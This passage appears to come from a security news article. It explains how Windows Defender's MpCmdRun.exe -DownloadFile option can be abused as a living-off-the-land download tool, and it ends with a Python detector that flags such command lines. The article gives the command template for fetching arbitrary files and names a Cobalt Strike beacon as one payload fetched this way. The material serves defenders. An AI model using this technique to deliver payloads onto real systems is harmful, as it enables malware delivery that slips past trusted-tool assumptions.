However, in one of its new updates, the mighty antivirus got a new DownloadFile command that allows anyone to download any file from a URL to a chosen path on your computer. We can call this an exploit since it could also be used to download malware, something that was discovered by security researcher Mohammad Askar, who posted his finding on Twitter.

How can Windows Defender be used to download malware?

It’s really simple to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download any file from an external source to your computer:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

In his test, Askar was able to download a Cobalt Strike beacon, a well-known attacker tool, using this command line. The new command is included in version 4.18.2007.8-0 and up, which gives attackers a pretty good starting point.

Basically, this feature turns Windows Defender into a LOLBin (living-off-the-land binary), a legitimate system file that can be used for malicious purposes. Fortunately, after you download the harmful file, it will be detected by the same Windows Defender or by another antivirus software if present.

From a reliable protection software, Windows Defender has turned into another possible threat that will have to be closely monitored by admins and security experts.
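For admins who need to monitor for this, the following is an added example (not from the original article or from Microsoft) of a check that flags process-creation command lines where MpCmdRun.exe is run with -DownloadFile and pulls out the URL and destination path. The sample command lines are constructed, and the function names are hypothetical.

```python
import re
import shlex

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe" '
    r'-DownloadFile -url https://example.invalid/file.bin -path C:\Users\Public\file.bin',
    r'mpcmdrun.exe -downloadfile -URL "http://example.invalid/a b.exe" -PATH "C:\Temp\a b.exe"',
    # Mentions the utility only inside another program's quoted argument.
    r'powershell.exe -c "Write-Output MpCmdRun.exe -DownloadFile"',
]

def tokenize(cmdline):
    """Split a Windows command line, keeping quoted arguments together."""
    try:
        parts = shlex.split(cmdline, posix=False)  # backslashes stay literal
    except ValueError:                             # unbalanced quote in the log
        parts = cmdline.split()
    return [p.strip('"') for p in parts]

def detect_download(cmdline):
    """Return {'url', 'path'} if MpCmdRun is invoked with -DownloadFile, else None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    # Compare only the executable's file name, case-insensitively.
    image = re.split(r'[\\/]', tokens[0])[-1].lower()
    if image not in ('mpcmdrun.exe', 'mpcmdrun'):
        return None
    args = tokens[1:]
    lowered = [a.lower() for a in args]
    if '-downloadfile' not in lowered:
        return None

    def value_of(flag):
        # The value is the token that follows the flag, if there is one.
        if flag in lowered and lowered.index(flag) + 1 < len(args):
            return args[lowered.index(flag) + 1]
        return None

    return {'url': value_of('-url'), 'path': value_of('-path')}

if __name__ == '__main__':
    for line in SAMPLE_EVENTS:
        hit = detect_download(line)
        if hit:
            print('ALERT MpCmdRun download:', hit['url'], '->', hit['path'])
```

Matching on the executable's file name rather than a substring of the whole line avoids flagging commands that merely mention MpCmdRun.exe in an argument.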
